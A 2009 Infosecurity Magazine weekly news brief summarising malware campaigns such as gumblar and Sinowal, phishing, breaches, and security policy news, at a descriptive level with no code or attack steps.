Infosecurity Weekly Brief - May 18 2009

Infections 

Malware authors co-opting Google search results are combatting the search giant's attempt to thwart them, using a new attack labelled 'gumblar'. Google had been delisting compromised sites with drive-by attacks pointing to a Latvian malware server. The criminals responded by uploading new scripts to the sites (generally using FTP credentials stolen by the malware), and instead inserting obfuscated scripts pointing to the gumblar.cn domain. This site has been distributing malware using attacks against Adobe PDF Reader and Flash Player, and also opens up a back door to a botnet command and controller server associated with forced redirections, of the type seen in the first wave of attacks. Instances of the attack soared 215% in a single week, according to ScanSafe. Others, such as Sophos, have also identified a marked increase in infected sites.

Facebook was the subject of yet another phishing attack. Compromised users' accounts were co-opted to send out Facebook messages asking recipients to visit sites such as 121.im or 123.im.

Pirated copies of Windows 7 were used to create a botnet with as many as 30 000 users, according to researchers from security firm Damballa. The malware dropper used to infect victims' machines was installed by the operating system unpacker, rather than injected into the Windows binary itself, making it relatively easy for the coders to implement the hack.

Intrusions
A laptop stolen from the United Food and Commercial Workers' Union may contain the email addresses, social security numbers, names and addresses of union members, said the organization. The laptop was stolen in March.


AVSim.com, a site carrying information for flight simulation equipment users, was effectively destroyed after hackers took down all of its servers. The owners, lamenting the lost of twelve years' worth of data for 60 000 users, said that they may never be able to recover the information again. The hackers' motives remain unknown.

The Twitter account for the New York Times' fashion session was hacked, and the perps used the service to spam links for porn cams to the Grey Lady's half-million Twitter readers.

Protections
The National Institute of Science and Technology has published a draft paper on how to automatically verify security settings. The paper describes how to use the Security Content Automation Protocol (SCAP), which is a collection of six open specifications. It has been mandated by the US Government’s Office of Management and Budget as a means of verifying security settings against the Federal Desktop Core Configuration.

Kaspersky has built detection for a new variant of the Sinowal master boot record malware into its products. The latest version of the malware, Backdoor.W32.Sinowal, penetrates the operating system at a lower level than the company has previously seen, it said, hooking device objects at the lowest level of the operating system to try and avoid detection. Infecting the master boot record then enables the rootkit to be reloaded each time the system reboots, and is very difficult to eradicate.

Former One Laptop Per Child security architect Ivan Krstic started at Apple, and will be responsible for helping to secure the firm's as-yet largely unexploited operating system, which it also updated this week.

Lawmakers introduced the Critical Electric Infrastructure Protection Act, in an attempt to get the US electricity industry to do what it has apparently not been doing, and secure its networks against attack.

 

Misdirections
Wired thinks that STRATCOM might consider nuking cyber-attackers - something that Russian officials have also left on the table. Let's hope not. We'd much rather have someone turn the lights off, than walking down Cormac McCarthy's The Road.

 

 

What’s hot on Infosecurity Magazine?